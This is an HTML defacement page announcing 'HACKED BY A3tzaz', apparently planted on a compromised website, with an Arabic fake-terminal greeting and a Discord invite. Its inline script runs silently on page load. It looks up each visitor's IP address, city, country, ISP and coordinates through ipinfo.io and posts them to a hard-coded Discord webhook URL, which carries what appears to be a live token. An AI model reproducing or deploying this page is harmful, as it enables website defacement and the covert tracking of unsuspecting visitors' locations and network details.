
<!DOCTYPE html>
<html lang="ar">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>HACKED BY A3tzaz</title>
  <style>
    body {
      margin: 0;
      padding: 0;
      font-family: 'Courier New', monospace;
      background: url('https://cdn.discordapp.com/attachments/1360327715407925462/1400940007358726174/1fb11b18d58a1d96334db9e0aea8a337.jpg') no-repeat center center fixed;
      background-size: cover;
      overflow: hidden;
      color: #ccc;
    }
    body::before {
      content: "";
      position: fixed;
      top: 0; left: 0;
      width: 100%; height: 100%;
      background: rgba(30, 30, 30, 0.75);
      z-index: 0;
    }
    .container {
      position: relative;
      z-index: 1;
      text-align: center;
      margin-top: 50px;
    }
    h1, h2 {
      text-transform: uppercase;
      font-weight: bold;
      text-shadow: 0 0 10px #555;
      font-family: 'Orbitron', sans-serif;
    }
    h2 {
      font-size: 28px;
      color: #999;
      margin-bottom: 10px;
    }
    h1 {
      font-size: 64px;
      color: #b0b0b0;
      margin-top: 10px;
    }
    .logo {
      width: 150px;
      height: auto;
      margin-bottom: 10px;
      filter: drop-shadow(0 0 6px #000);
    }
    .terminal {
      background-color: #1f1f1f;
      border: 1px solid #444;
      width: 80%;
      max-width: 600px;
      margin: 30px auto;
      padding: 20px;
      text-align: left;
      box-shadow: 0 0 10px #000;
      border-radius: 6px;
    }
    .discord {
      color: #888;
      font-weight: bold;
    }
    .command {
      color: #aaa;
    }
    .response {
      color: #ccc;
      margin-top: 8px;
    }
  </style>
  <link href="https://fonts.googleapis.com/css2?family=Orbitron:wght@700&display=swap" rel="stylesheet">
</head>
<body>
  <div class="container">
    <img class="logo" src="https://cdn.discordapp.com/attachments/1360327715407925462/1400951794779029796/bdb24751-1862-4d00-9052-eb07815e3091.png" alt="Logo">
    <h2></h2>
    <h1>HACKED BY A3tzaz</h1>
    <div class="terminal">
      <div class="discord">● ● ● discord.gg/6dz</div>
      <div class="command">root@system:~$ من أنت؟</div>
      <div class="response">A3tzaz : احبكم ياعيال وا عوافي</div>
    </div>
  </div>
  <audio id="bg-music" autoplay loop>
    <source src="sheela.mp3" type="audio/mpeg">
  </audio>
  <script>
    document.body.addEventListener("click", () => {
      const audio = document.getElementById("bg-music");
      audio.play().catch(e => console.log("فشل تشغيل الصوت تلقائيًا:", e));
    }, { once: true });

    fetch("https://ipinfo.io/json?token=ipinfo")
      .then(response => response.json())
      .then(data => {
        const webhookUrl = "https://discord.com/api/webhooks/1400955969734709378/i-5ybvxtfznOEsjB-hpcdRfD99f2h_XG19TAHoHqxaBdrCk2CQaxsupQ-t0Q5928Fl-h";
        const payload = {
          content: null,
          embeds: [
            {
              title: "📡 تم فتح الصفحة",
              color: 65280,
              fields: [
                { name: "📍 IP", value: data.ip, inline: true },
                { name: "🌍 المدينة", value: data.city || "?", inline: true },
                { name: "🇺🇳 الدولة", value: data.country || "?", inline: true },
                { name: "🧭 ISP", value: data.org || "?", inline: false },
                { name: "🛰️ الموقع", value: data.loc || "?", inline: false }
              ],
              footer: { text: "Hacked by A3tzaz" },
              timestamp: new Date().toISOString()
            }
          ]
        };

        fetch(webhookUrl, {
          method: "POST",
          headers: { "Content-Type": "application/json" },
          body: JSON.stringify(payload)
        });
      })
      .catch(error => console.error("فشل في جلب البيانات", error));
  </script>
</body>
</html>
